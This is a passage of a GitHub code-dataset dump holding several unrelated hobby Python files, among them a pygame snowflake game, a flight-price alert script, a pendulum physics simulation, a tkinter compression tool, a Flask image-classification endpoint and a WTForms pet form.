[data]\n\t\tself.nopoints += [pF]\n\tprint()\n\tprint([self.ydata, self.ndata])\n\tcheckcover()\n\t\n\ndef randompoints():\n\tyout, nout = [], []\n\tself.yespoints = []\n\tself.nopoints = []\n\tfor _ in range(16):\n\t\ta = random.uniform(0, 1)\n\t\tr = random.uniform(0, 1)\n\t\tn = 0\n\t\tif n % 2 == 1:\n\t\t\ta = 1 - a\n\t\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\t\tpos = S, C\n\t\tcovered = self.design.colorat(pos)\n\t\tif covered:\n\t\t\tself.yespoints.append((S, C))\n\t\t\tyout.append((a, r, n))\n\t\telse:\n\t\t\tself.nopoints.append((S, C))\n\t\t\tnout.append((a, r, n))\n\tprint(yout)\n\tprint(nout)\n\tcheckcover()\n\ndef isred(color):\n\tr, g, b, a = ptext._resolvecolor(color, None)\n\treturn r > 1.01 * g and r > 1.01 * b\n\ndef iscovered(pos):\n\tcovered = self.design.colorat(pos)\n\tif self.held:\n\t\theldcolor = self.held.colorat(render.tosector0(pos))\n\t\tif heldcolor:\n\t\t\tcovered = heldcolor\n\treturn not (covered is None or isred(covered))\n\ndef checkcover():\n\tself.yescovers = []\n\tself.nocovers = []\n\tfor pos in self.yespoints:\n\t\tself.yescovers.append(iscovered(pos))\n\tfor pos in self.nopoints:\n\t\tself.nocovers.append(iscovered(pos))\n\ndef checkdone():\n\tif self.stage == \"free\":\n\t\treturn\n\n\tif self.stage == \"stage1\":\n\t\tself.done = self.store[0][1] == 0\n\telse:\n\t\tself.done = all(self.yescovers) and not any(self.nocovers)\n\n\ndef getjstore(shape):\n\tif self.stage == \"free\":\n\t\treturn None\n\tfor jstore, store in enumerate(self.store):\n\t\tif store[0].same(shape):\n\t\t\treturn jstore\n\tprint(\"Error restoring shape.\")\n\treturn None\n\n\ndef onclick(button):\n\tif button.text == \"Quit\":\n\t\tscene.push(frostscene, depth1 = 3)\n\t\tsound.play(\"fail\")\n\tif button.text == \"Share\":\n\t\tif self.design.shapes:\n\t\t\tscene.push(uploadscene, self.design, Fspot1)\n\t\tsound.play(\"bonk\")\n\tif button.text.startswith(\"store-\"):\n\t\tjstore = int(button.text[6:])\n\t\tshape, n = self.store[jstore]\n\t\tshape = button.shape\n\t\tif n is not None and n <= 0:\n\t\t\tsound.play(\"no\")\n\t\telif self.maxshapes is not None and len(self.design.shapes) >= self.maxshapes:\n\t\t\tsound.play(\"no\")\n\t\telse:\n\t\t\tif n is not None:\n\t\t\t\tself.store[jstore][1] -= 1\n\t\t\tself.held = shape.copy()\n\t\t\tself.cursorimg = self.held.cursorimg(T(100))\n\t\t\tself.jheld = 0\n\tif button.text.startswith(\"color-\") or button.text == \"???\":\n\t\tsound.play(\"bonk\")\n\t\tif \"?\" in button.text:\n\t\t\tcolor = \"#\" + \"\".join(random.choice(\"89abcdef\") for _ in range(6))\n\t\telse:\n\t\t\tcolor = tuple(pygame.Color(button.text[6:]))\n\t\t\tcolors = [math.imix(color, (255, 255, 255, 255), a) for a in (0, 0.2, 0.4, 0.6, 0.8)]\n\t\t\tcolornow = tuple([button.shape.color for button in self.buttons if button.text == \"store-0\"][0])\n\t\t\tif colornow in colors:\n\t\t\t\tcolor = colors[(colors.index(colornow) + 1) % len(colors)]\n\t\t\telse:\n\t\t\t\tcolor = colors[0]\n\t\tfor button in self.buttons:\n\t\t\tif button.text.startswith(\"store-\"):\n\t\t\t\tshape = button.shape.copy()\n\t\t\t\tshape.color = color\n\t\t\t\tbutton.setshape(shape)\n\tif button.text.startswith(\"size-\"):\n\t\tsound.play(\"bonk\")\n\t\tksize = int(button.text[5:])\n\t\tfor button in self.buttons:\n\t\t\tif button.text.startswith(\"store-\"):\n\t\t\t\tshape = button.shape.copy()\n\t\t\t\tshape.setksize(ksize)\n\t\t\t\tbutton.setshape(shape)\n\ndef draw():\n\tif pview._fullscreen:\n\t\tpygame.mouse.set_visible(True)\n\telse:\n\t\tpygame.mouse.set_visible(not self.inFbox0 or self.held is None)\n\tbackground.draw()\n\n\tfor jbutton, button in enumerate(self.buttons):\n\t\tnote = None\n\t\tif button.text.startswith(\"store-\"):\n\t\t\tjstore = int(button.text[6:])\n\t\t\tnote = self.store[jstore][1]\n\t\t\tif note is not None:\n\t\t\t\tnote = \"%d\" % note\n\t\tif self.maxshapes is not None and len(self.design.shapes) >= self.maxshapes:\n\t\t\tnote = \"\"\n\t\tbutton.draw(lit = (jbutton == self.jbutton), note = note)\n\tself.design.drawwedge(Fspot0)\n\tself.design.draw(Fspot1)\n\trender.sector0(Fspot0)\n\tif self.inFbox0:\n\t\trender.sectors(Fspot1)\n\n\tfor text, pos in self.labels:\n\t\tptext.draw(text, center = T(pos), fontsize = T(30),\n\t\t\tcolor = \"#ffffaa\", fontname = \"ChelaOne\",\n\t\t\tshade = 1, owidth = 0.4, shadow = (1, 1))\n\n\tFspot = Fspot0 if settings.closepoints else Fspot1\t\n\ta = math.cycle(pygame.time.get_ticks() / 500)\n\toffcolor = pygame.Color(*math.imix((50, 50, 100), (100, 100, 255), a))\n\tfor (x, y), covered in zip(self.yespoints, self.yescovers):\n\t\tp = view.BconvertF(Fspot, (x, y))\n\t\tcolor = pygame.Color(\"#aaaaff\") if covered else offcolor\n\t\tocolor = pygame.Color(\"black\" if covered else \"white\")\n\t\tpygame.draw.circle(pview.screen, ocolor, T(p), T(8))\n\t\tpygame.draw.circle(pview.screen, color, T(p), T(6))\n\toncolor = pygame.Color(*math.imix((100, 50, 50), (255, 100, 100), a))\n\tfor (x, y), covered in zip(self.nopoints, self.nocovers):\n\t\tp = view.BconvertF(Fspot, (x, y))\n\t\tcolor = oncolor if covered else pygame.Color(\"#884444\")\n\t\tocolor = pygame.Color(\"white\" if covered else \"black\")\n\t\trect = T(pygame.Rect(0, 0, 16, 16))\n\t\trect.center = T(p)\n\t\tpygame.draw.rect(pview.screen, ocolor, rect)\n\t\trect = T(pygame.Rect(0, 0, 12, 12))\n\t\trect.center = T(p)\n\t\tpygame.draw.rect(pview.screen, color, rect)\n\tif settings.DEBUG:\n\t\tptext.draw(str(self.pointcolor), bottomright = T(1260, 710), fontsize = T(30))\n\n\tif self.yespoints:\n\t\tn = len(self.yescovers)\n\t\ta = sum(self.yescovers)\n\t\ttext = \"Remaining: %d/%d\" % (n - a, n)\n\t\tptext.draw(text, topright = T(1280, 0), fontsize = T(38), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ccccff\", shade = 0.5, shadow = (1, 1))\n\tif self.nopoints:\n\t\tn = len(self.nocovers)\n\t\ta = sum(self.nocovers)\n\t\ttext = \"Covered: %d/%d\" % (a, n)\n\t\tptext.draw(text, topright = T(1280, 38), fontsize = T(38), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ffcccc\", shade = 0.5, shadow = (1, 1))\n\tif (self.yespoints or self.nopoints) and settings.closepoints:\n\t\tptext.draw(\"EASY MODE: ON\", topleft = T(10, 500), fontsize = T(30),\n\t\t\tcolor = \"#ffffaa\", fontname = \"ChelaOne\",\n\t\t\tshade = 1, owidth = 0.4, shadow = (1, 1))\n\n\tif self.maxshapes is not None:\n\t\ttext = \"Shapes used: %d/%d\" % (len(self.design.shapes), self.maxshapes)\n\t\tptext.draw(text, topright = T(1280, 0), fontsize = T(38), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ffffff\", shade = 0.5, shadow = (1, 1))\n\n\tif self.held and self.inFbox0:\n\t\tfor j, anchor in enumerate(self.held.anchors):\n\t\t\tcolor = \"white\" if j == self.jheld else \"orange\"\n\t\t\trender.anchor(Fspot0, anchor, color)\n\t\tself.held.drawoutline0(Fspot0)\n\t\tself.held.drawoutline(Fspot1)\n\telse:\n\t\tif self.held:\n\t\t\trect = self.cursorimg.get_rect(center = T(self.mpos))\n\t\t\tpview.screen.blit(self.cursorimg, rect)\n\t\tfor i, j, anchor in self.design.anchors():\n\t\t\tcolor = \"white\" if (i, j) == self.panchor else \"orange\"\n\t\t\trender.anchor(Fspot0, anchor, color)\n\n\tif self.stage in stagedata.helptext:\n\t\ttext = stagedata.helptext[self.stage]\n\t\talpha = 0.3 if self.mpos[1] > 600 else 1\n\t\tptext.draw(text, midbottom = T(640, 700), fontsize = T(38), width = T(1000), owidth = 0.5,\n\t\t\tfontname = \"ChelaOne\", color = \"#ffffaa\", shade = 1, shadow = (1, 1), alpha = alpha)\n\ndef save():\n\tstate = {\n\t\t\"design\": self.design.getspec(),\n\t}\n\tjson.dump(state, open(settings.savefilename, \"w\"))\n\ndef canload():\n\treturn os.path.exists(settings.savefilename)\n\ndef load():\n\tstate = json.load(open(settings.savefilename, \"r\"))\n\tself.design = flake.Design(state[\"design\"])\n\n\n","repo_name":"cosmologicon/pyjam","sub_path":"snowcrafter/src/playscene.py","file_name":"playscene.py","file_ext":"py","file_size_in_byte":14509,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"20656339237","text":"from data_manager import DataManager\nfrom flight_search import FlightSearch\nfrom notification_manager import NotificationManager\nfrom datetime import datetime, timedelta\n\ndata_manager = DataManager()\nflight_search = FlightSearch()\nnotification_manager = NotificationManager()\n\nsheet_data = data_manager.get_destination_data()\n\nORIGIN_CITY_IATA = \"LON\"\n\nif sheet_data[0][\"iataCode\"] == \"\":\n for city in sheet_data:\n city[\"iataCode\"] = flight_search.get_destination_code(city[\"city\"])\n data_manager.destination_data = sheet_data\n data_manager.update_destination_codes()\n\ntomorrow = datetime.now() + timedelta(days=1)\nsix_month_from_tomorrow = tomorrow + timedelta(days=(6 * 30))\n\nfor destination in sheet_data:\n flight = flight_search.check_flights(\n ORIGIN_CITY_IATA,\n destination[\"iataCode\"],\n tomorrow,\n six_month_from_tomorrow\n )\n if flight is None:\n continue\n if flight.price < destination[\"lowestPrice\"]:\n users = data_manager.get_customer_emails(destination[\"email\"])\n emails = [row[\"email\"] for row in users]\n names = [row[\"firstName\"] for row in users]\n message = (f\"Low price alert! Only ${flight.price} to fly from {flight.origin_city}-{flight.origin_airport}\"\n f\" to {flight.destination_city}-{flight.destination_airport},\"\n f\" from {flight.out_date} to {flight.return_date}.\")\n if flight.stop_overs > 0:\n message += f\"{flight.stop_overs} stopovers, via {flight.via_city}.\"\n print(message)\n notification_manager.send_emails(emails, message)\n","repo_name":"IvanTrigueiro/100-Days-of-Python-Pro-2023","sub_path":"Day-39-40-Flight-Tracker-Club/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38168067072","text":"\n# * Generators!\n# ? Generators are Iterators\n# ? Generators can be created with generator functions\n# ? Generator functions use the YIELD keyword\n# ? Generators can be created with generator expressions\n\n# * Generator Functions (compared to functions)\n# ? uses YIELD (uses return)\n# ? can YIELD multiple times (returns once)\n# ? When invoked, returns a generator (returns the return value)\n\n\ndef week():\n days = [\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n \"Saturday\",\n \"Sunday\"\n ]\n for day in days:\n yield day\n\n\ndef yes_or_no():\n response = 'yes'\n while True:\n yield response\n response = 'no' if response == 'yes' else 'yes'\n","repo_name":"Pat-Brennan/Udemy-Python-Bootcamp","sub_path":"iterators-generators/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"23671993323","text":"\n\n\n\n# Thank-You https://medium.com/towards-artificial-intelligence/datetime-manipulations-with-python-de57aa7e3439\ndef datetime_examples():\n \"\"\"\n docstring here\n \"\"\"\n from datetime import date\n from datetime import time\n from datetime import datetime\n\n import calendar\n today = date.today();\n print(f\"The Date today is {today}\")\n print(f\"The constituent parts of the date today are : Day {today.day} | Month {today.month} | Year {today.year}\")\n print(\"Lets convert this to strings\")\n\n weekday = today.weekday()\n weekdayName = calendar.day_name[weekday]\n monthName = calendar.month_name[today.month]\n print(f\"It's a {weekdayName} in {monthName}\")\n\n now = datetime.now();\n print(f\"Ok to the millisecond its : {now}\")\n print(f\"If i were to only think interms of time : {now.time()}\")\n \n #NB the timezone is 'None' see the timezone section for how to enable it.\n timeZone = now.tzname()\n print(f\"Timezone is unset {timeZone}\")\n\n #Adding relative amounts of time / dates see timedelta.\n\n\n# https://powerfulpython.com/blog/checking-dict-keys/\ndef dictionary_manipulation() :\n return None;","repo_name":"davewd/python_cheatsheet","sub_path":"python_cheatsheet/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35668941342","text":"#Projeto 1\r\n#Pêndulo elastico\r\n\r\n\r\n\r\n\r\nfrom math import *\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\nimport numpy as np\r\n\r\ng = 9.8\r\n\r\n#Caracteristicas do pendulo\r\nprint('Informe as características do sistema')\r\nk = float(input('Constânte da mola em N/m:'))\r\nm = float(input('Massa do pendulo em kg:'))\r\nL = float(input('Comprimento natural da mola em metro:'))\r\n\r\n\r\n#posiao inicial em dadas pelo angulo e comprimento inicial\r\nprint('Informe ascoordenadas da posição inicial do pêndulo ')\r\nr = float(input('Comprimento inicial da mola: '))\r\ndif = sqrt((L-r)**2)\r\nwhile dif >= L:\r\n\tprint('Se a diferença entre o comprimento natural e inicial da mola for maior que o comprimento natural, talvez o programa não funcione')\r\n\tr = float(input('Por favor, digite outro comprimento inicial da mola: '))\r\n\tdif = sqrt((L-r)**2)\r\n\r\ntheta = radians(float(input('Angulo inicial: ')))\r\n\r\n#tempo total\r\ndelta_t = 0.0025\r\ntime = int(input('informe o tempo em segundos:'))\r\n\r\nn = time//delta_t\r\nn = int(n)\r\n\r\n#precisão\r\np = 1001\r\nwhile p > 1000 or p < 0:\r\n \r\n p = 10**int(input('Informe a precisãodo programa de 0 à 3.'\r\n 'OBS: Dependendo do tempo total e da precisão '\r\n 'o programa demora um pouco para rodar''\\n',))\r\n\r\n \r\n#definindo as listas\r\nposition_rad = []\r\nposition_theta = []\r\nposition_x = []\r\nposition_z = []\r\nlist_time = [0]\r\nlist_v = [0] # para o gráfico módulos de v vs t\r\nlist_v_x = [0]\r\nlist_v_z = [0]\r\nacceleration = []\r\nacceleration_x = []\r\nacceleration_z = []\r\nEnergy = []\r\n\r\n#Colocando o primeiro item das listas\r\nposition_rad.append(r)\r\nposition_theta.append(degrees(theta))\r\nposition_x.append(r*sin(theta))\r\nposition_z.append(r*cos(theta))\r\n\r\n\r\n#função para criar arquivos de saída\r\ndef bloco(nome, dado, a):\r\n dado = str(dado)\r\n arquivo = open(nome + '.txt', a)\r\n arquivo.write(dado + '\\n')\r\n arquivo.close()\r\n \r\nnames = ['time','position_x','position_z','velocity_x','velocity_z','acceleration_x','acceleration_z']\r\nfor j in range(len(names)):\r\n bloco(names[j],names[j], 'w')\r\n\r\n\r\n\r\n#contador do tempo\r\ndef time_up(t):\r\n cont_time = 0\r\n for i in range(n):\r\n cont_time = cont_time + t\r\n list_time.append(round(cont_time,5))\r\n \r\n#função de atualização em coord. polar \r\ndef runnig_values(r, theta, L):\r\n\r\n #adicionando algumas condições iniciais alis\r\n \r\n v_rad = 0 \r\n v_ang = 0\r\n \r\n acc = sqrt((- g*sin(theta)/r)**2 + (-k*(r-L)/m + g*cos(theta))**2)\r\n acceleration.append(acc) # aceleração inicial\r\n acceleration_x.append(acc*sin(theta))\r\n acceleration_z.append(acc*cos(theta))\r\n \r\n E_mec = -m*g*r*cos(theta)+ (k*(r-L)**2)/2 # energia inicial\r\n Energy.append(E_mec) # energia inicial\r\n\r\n \r\n for i in range(n):\r\n for i in range(p):#dois \"for\" para aumentar a precisão\r\n #Caso qeiram deixar o programa mais rápido, apenas diminua o valor\r\n #de p, se quiser deixar mais preciso, aumente\r\n #Atualização da posição angular\r\n acc_ang = - g*sin(theta)/r - 2*v_ang*v_rad/r\r\n v_ang = v_ang + acc_ang*delta_t/p\r\n theta = theta + v_ang*delta_t/p\r\n \r\n\r\n\r\n #atualização da posição no eixo r\r\n acc_rad = -k*(r-L)/m + g*cos(theta) + (v_ang**2)*r\r\n v_rad = v_rad + acc_rad*delta_t/p\r\n r = r + v_rad*delta_t/p\r\n\r\n \r\n \r\n \r\n \r\n #passando para cartesiano\r\n acc = sqrt((acc_ang*r)**2 + acc_rad**2)\r\n v_mod = sqrt(v_rad**2 + (r*v_ang)**2)\r\n v_x = v_ang*r*cos(theta) - v_rad*sin(theta)\r\n v_z = v_rad*cos(theta) - v_ang*r*sin(theta)\r\n x = r*sin(theta)\r\n z = r*cos(theta)\r\n acc_x = acc*sin(theta)\r\n acc_z = acc_rad*cos(theta) - acc_ang*r*sin(theta)\r\n\r\n \r\n E_mec = (m*v_mod**2)/2 - m*g*r*cos(theta) + (k*(r-L)**2)/2\r\n #A energia se conserva pois permanece aproximadamente constante\r\n #As pequenas oscilações na ordem de 10^-3\r\n #são devido ao erro da integraçã numérica\r\n \r\n #Adicionando os itens às respectivas listas\r\n position_x.append(round(x,5))\r\n position_z.append(round(z,5))\r\n list_v.append(round(v_mod,5))\r\n list_v_x.append(round(v_x,5))\r\n list_v_z.append(round(v_z,5))\r\n acceleration.append(round(acc,5))\r\n acceleration_x.append(round(acc_x,5))\r\n acceleration_z.append(round(acc_z,5))\r\n position_rad.append(round(r,5))\r\n Energy.append(round(E_mec,5))\r\n\r\n\r\n\r\nrunnig_values(r, theta, L)\r\ntime_up(delta_t)\r\n\r\n\r\n#fazendo os gráficos\r\nlogical_graf = input('Deseja abrir os gráficos? Digite s ou n' '\\n')\r\nif logical_graf == 's':\r\n \r\n def grafic(x,y,lab_x,lab_y):\r\n plt.plot(x,y)\r\n plt.xlabel(lab_x)\r\n plt.ylabel(lab_y)\r\n plt.show()\r\n grafic(position_x, position_z ,'posição x em m','Posição z em m' )\r\n grafic(list_time, Energy , 'tempo s','Energia mecanica' )\r\n grafic(list_time, position_rad , 'tempo s','Comprimento em m' )\r\n grafic(list_time, list_v ,\"tempo s\",'vocidade m/s' )\r\n grafic(list_time, acceleration, 'tempo s',' aceleracao m/s^2')\r\n grafic(position_x, list_v_x ,'posicao x (metro)','velocidade no eixo x m/s' )\r\n grafic(position_z, list_v_z ,'posicao z (metro)','velocidade no eixo z m/s' )\r\n\r\n#Criando arquivos de saída\r\nlogical_arq = input('Deseja criar arquivos de saída para os dados? Digite s ou n' '\\n')\r\nif logical_arq == 's':\r\n ll = [list_time, position_x,\r\n position_z,\r\n list_v_x,\r\n list_v_z,\r\n acceleration_x, acceleration_z]\r\n\r\n l_label = ['time','position_x', 'position_z',\r\n 'velocity_x', 'velocity_z', 'acceleration_x',\r\n 'acceleration_z']\r\n \r\n for j in range(len(l_label)):\r\n for i in range(len(list_time)):\r\n bloco(l_label[j], ll[j][i], 'a')\r\n \r\n\r\n#Animação do pêndulo\r\nlogical_ani = input('Deseja abrir a simulação? Digite s ou n' '\\n')\r\nif logical_ani == 's':\r\n\r\n fig, ax = plt.subplots()\r\n xdata, ydata = position_x, position_z\r\n ln, = plt.plot([], [], 'ro', animated = True)\r\n spring, = plt.plot([], [], 'b-', linewidth = 2)\r\n\r\n\r\n\r\n def init():\r\n ax.set_xlim(-2*L, 2*L)\r\n ax.set_ylim(2*r,0)\r\n return ln,\r\n\r\n def draw(n):\r\n spring.set_data([ 0.0, xdata[n] ], [ 0.0, ydata[n] ])\r\n ln.set_data(xdata[n], ydata[n])\r\n return spring,ln\r\n\r\n ani = FuncAnimation(fig, draw, n, interval= 0.001,\r\n init_func=init, blit=True)\r\n plt.show()\r\n","repo_name":"Gustavobflh/IntroPython","sub_path":"Projeto 1/Projeto_pendulo_mola_gustavo.py","file_name":"Projeto_pendulo_mola_gustavo.py","file_ext":"py","file_size_in_byte":6695,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"36798442815","text":"#!/usr/bin/env python3\n\n# A Simple Application for handling yay0 files\n\nfrom tkinter import *\nimport tkinter.filedialog as filedialog\nfrom PIL import Image, ImageTk\nimport os, logging\nimport frontend, lzyf\n\nclass Application(Frame):\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master = master\n self.appName = \"Application Utility\"\n self.infilename = ''\n self.tmpfilename = \"game_over.256x32.png\"\n self.log = logging.getLogger(self.appName)\n self.prepare()\n def prepare(self):\n self.master.title(self.appName)\n self.pack(fill=BOTH, expand=1)\n quitButton = Button(self, text=\"Decode\",\n command=self.image_decode)\n quitButton.place(x=0, y=0)\n self.textLabel = Label(self, text=\"Ready!\")\n self.textLabel.place(x=0, y=50)\n self.imgLabel = Label(self, image=None)\n self.imgLabel.place(x=0, y=100)\n\n mainMenu = Menu(self.master)\n self.master.config(menu=mainMenu)\n\n fileMenu = Menu(mainMenu)\n fileMenu.add_command(label=\"Open...\", command=self.open_file)\n fileMenu.add_command(label=\"Save PNG\", command = self.save_file)\n fileMenu.add_command(label=\"Exit\", command=self.app_exit)\n mainMenu.add_cascade(label=\"File\", menu=fileMenu)\n\n viewMenu = Menu(mainMenu)\n viewMenu.add_command(label=\"Show Image\", command=self.show_image)\n viewMenu.add_command(label=\"Show Text\", command=self.show_text)\n mainMenu.add_cascade(label=\"View\", menu=viewMenu)\n\n toolsMenu = Menu(mainMenu)\n toolsMenu.add_command(label=\"Compress Yay0 file...\", command=self.compress_yay0)\n toolsMenu.add_command(label=\"Compress LZYF file...\", command=self.compress_lzyf)\n mainMenu.add_cascade(label=\"Tools\", menu=toolsMenu)\n def image_decode(self):\n self.tmpfilename = ''\n ext = frontend.parseFilename(self.infilename)[-1]\n # If file extension ends in y it's pixel data only with a\n # separate palette file containing palette information.\n if 'y' == ext[-1]:\n self.tmpfilename = frontend.processMultiFileImage(self.infilename)\n else:\n self.tmpfilename = frontend.processSingleFileImage(self.infilename)\n if(self.tmpfilename == ''):\n self.textLabel['text'] = \"Image Decode Failed!\"\n else:\n self.textLabel['text'] = \"Image Decoded Successfully!\"\n def open_file(self):\n self.infilename = filedialog.askopenfilename()\n self.log.info((\"Selected: %s\" % self.infilename))\n self.textLabel['text'] = \"Opened:\"+self.infilename\n def save_file(self):\n self.outfilename = frontend.getPngFileName(self.infilename)\n os.rename(self.tmpfilename, self.outfilename)\n self.textLabel['text'] = \"Saved:\" + self.outfilename\n def app_exit(self):\n exit()\n def show_image(self):\n load = Image.open(self.tmpfilename) # TODO: Modify this !!!\n render = ImageTk.PhotoImage(load)\n # self.imgLabel = Label(self, image=render)\n self.imgLabel.configure(image=render)\n self.imgLabel.image = render\n # self.imgLabel.configure(image=render)\n # self.imgLabel.place(x=0, y=100)\n def show_text(self):\n self.textLabel['text'] = \"Image Displayed!\"\n def compress_yay0(self):\n self.textLabel['text'] = \"Not Yet Implemented!\"\n def compress_lzyf(self):\n file_types = [(\"Binary File\",\"*.bin\"),(\"All Files\",\"*\")]\n f_in = filedialog.askopenfile(master=self, mode=\"rb\",title=\"Open File\",filetypes=file_types)\n self.textLabel.configure(text=\"Compressing... please wait!\")\n self.update()\n if f_in:\n out = lzyf.create_lzyf(f_in.read())\n file_types = [(\"LZYF File\",\"*.lzyf\"),(\"Binary File\",\"*.bin\"),(\"All Files\",\"*\")]\n n = file_types[0][1].replace('*', os.path.splitext(f_in.name)[0], 1)\n print(\"Initial file {}\".format(n))\n f_out = filedialog.asksaveasfile(mode=\"wb\", initialfile=n, title=\"Save As...\", filetypes=file_types)\n if f_out != None:\n f_out.write(out)\n self.textLabel['text'] = \"Compressed {} to {}\".format(f_in.name, f_out.name)\n else:\n self.textLabel['text'] = \"Aborted!\"\n else:\n self.textLabel['text'] = \"Aborted!\"\n\ndef main():\n logging.basicConfig(level=logging.INFO)\n root = Tk()\n root.geometry(\"400x400\")\n app = Application(root)\n root.mainloop()\n\nif __name__ == '__main__':\n main()\n","repo_name":"madhuri2k/fantastic-spoon","sub_path":"yay0/app.pyw","file_name":"app.pyw","file_ext":"pyw","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16862468209","text":"import tensorflow as tf\nfrom PIL import Image\nimport numpy as np\nfrom flask import Flask,jsonify,request\nimport werkzeug\nimport os\nimport json\n\n# from flask_cors import CORS, cross_origin\napp = Flask(__name__)\n# cors = CORS(app)\n# app.config['CORS_HEADERS'] = 'Content-Type'\n\n\n\n\nnewsize = (299,299)\nvalue_lookup = {\n 0 : 'No DR',\n 1 : 'Mild',\n 2 : 'Moderate',\n 3 : 'Severe',\n 4 : 'Proliferative DR'\n}\n\n@app.route('/webRequset',methods = ['POST'])\ndef get_FromWeb():\n imagefile = request.files['image']\n filename = werkzeug.utils.secure_filename(imagefile.filename)\n imagefile.save('uploadedimages/'+filename)\n s = os.listdir(\"./uploadedimages\")\n file_ = \"./uploadedimages/\" + s[0]\n test_single = Image.open(file_)\n test_single = test_single.resize(newsize)\n test_single = np.asarray(test_single)\n print(test_single.shape)\n \n # return jsonify({'result':value_lookup[result]})\n\n\n\n@app.route('/upload',methods = ['POST'])\ndef upload():\n if(request.method == 'POST'):\n imagefile = request.files['image']\n filename = werkzeug.utils.secure_filename(imagefile.filename)\n imagefile.save('uploadedimages/'+filename)\n s = os.listdir(\"./uploadedimages\")\n file_ = \"./uploadedimages/\" + s[0]\n test_single = Image.open(file_)\n test_single = test_single.resize(newsize)\n test_single = np.asarray(test_single)\n test_single = test_single* (1. / 255)\n print(test_single.shape)\n test_single = test_single.reshape(1,299, 299, 3)\n Xmodel = tf.keras.models.load_model('./work.h5')\n pred = Xmodel.predict(test_single)\n result = np.argmax(pred)\n os.remove(file_)\n print(result)\n return jsonify({'result':value_lookup[result]})\n\nif __name__ == \"__main__\":\n app.run(port=4000,debug=True,host=\"0.0.0.0\")","repo_name":"vijayshankarrealdeal/ProjectWork","sub_path":"ProjectX/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27387768334","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, IntegerField, TextAreaField, BooleanField, SelectField, FileField\nfrom wtforms.validators import InputRequired, Optional, Email, NumberRange, URL, ValidationError, Regexp\n\nclass AddPetForm(FlaskForm):\n \"\"\"form for adding pet to the database\"\"\"\n name = StringField(\"Pet's Name\", validators=[InputRequired(message=\"Pet's Name cannot be blank\")])\n species = SelectField('Species', choices=[('cat', 'Cat'), ('dog', 'Dog'), ('porcupine', 'Porcupine')])\n photo = StringField(\"Photo URL of Pet\", validators=[Optional(),URL(require_tld=True, message=\"Should be a vaild URL\")])\n age = IntegerField(\"Age of Pet\",validators=[NumberRange(min=0, max=30, message=\"Age should be between 0 to 30\"),Optional()])\n notes = TextAreaField(\"Other Notes\", validators=[Optional()])\n available = BooleanField(\"Is Available?\")\n\nclass EditPetInfo(FlaskForm):\n \"\"\"update and edit pet's information in the database\"\"\"\n photo_url = StringField(\"Photo URL of Pet\", validators=[Optional(),Regexp(r'^(http:|https:|/)(\\w|[=+/?.-])*')])\n upload = FileField(\"Image Upload\", validators=[Optional()])\n notes = TextAreaField(\"Other Notes\", validators=[Optional()])\n available = BooleanField(\"Is Available?\")\n\n def validate_photo_upload(self,photo_url,upload):\n if photo_url and upload:\n raise ValidationError(\"Photo Upload or PhotoURL fields should be filled, not both...\")\n \n\n\n","repo_name":"nikgun1984/Adoption_Agency","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4103900365","text":"import math\nfrom time import sleep\nfrom typing import Any, Tuple\n\nfrom loguru import logger\n\nfrom .command import ActivatedModes, Command, CommandParser, TimeType, WeatherType\nfrom .evo_encoder import EvoEncoder\nfrom .evo_pixmap import RawPixmap\nfrom .packet import Packet, ResponsePacket\nfrom .pixoo import Pixoo\n\n\ndef parse_packet(data: bytes) -> Any:\n return Packet.parse(CommandParser(), data)\n\n\ndef parse_response_packet(data: bytes) -> Any:\n return ResponsePacket.parse(CommandParser(), data)\n\n\ndef hsv_to_rgb(h: int, s: int, v: int) -> Tuple[float, float, float]:\n \"\"\"Convert HSV color space to RGB color space\n source: https://code.activestate.com/recipes/576554-covert-color-space-from-hsv-to-rgb-and-rgb-to-hsv/\n by Victor Lin, MIT license\n\n @param h: Hue\n @param s: Saturation\n @param v: Value\n return (r, g, b)\n \"\"\"\n\n hi = math.floor(h / 60.0) % 6\n f = (h / 60.0) - math.floor(h / 60.0)\n p = v * (1.0 - s)\n q = v * (1.0 - (f * s))\n t = v * (1.0 - ((1.0 - f) * s))\n return {\n 0: (v, t, p),\n 1: (q, v, p),\n 2: (p, v, t),\n 3: (p, q, v),\n 4: (t, p, v),\n 5: (v, p, q),\n }[hi]\n\n\ndef test_pattern(test: int, d: Pixoo) -> None:\n if test == 1:\n logger.info(\"sleep color test\")\n d.set_sleep_color(100, 0, 0)\n elif test == 2:\n logger.info(\"score board test\")\n d.set_score(23, 42)\n d.set_brightness(50)\n sleep(0.5)\n\n d.set_brightness(99)\n sleep(0.5)\n elif test == 3:\n logger.info(\"rgb+ test\")\n d.set_brightness(99)\n d.set_system_color(255, 100, 100)\n sleep(0.5)\n d.set_sleep_color(255, 0, 0)\n sleep(0.5)\n d.set_sleep_color(0, 255, 0)\n sleep(0.5)\n d.set_sleep_color(0, 0, 255)\n sleep(0.5)\n d.set_sleep_color(255, 0, 255)\n sleep(0.5)\n elif test == 4:\n 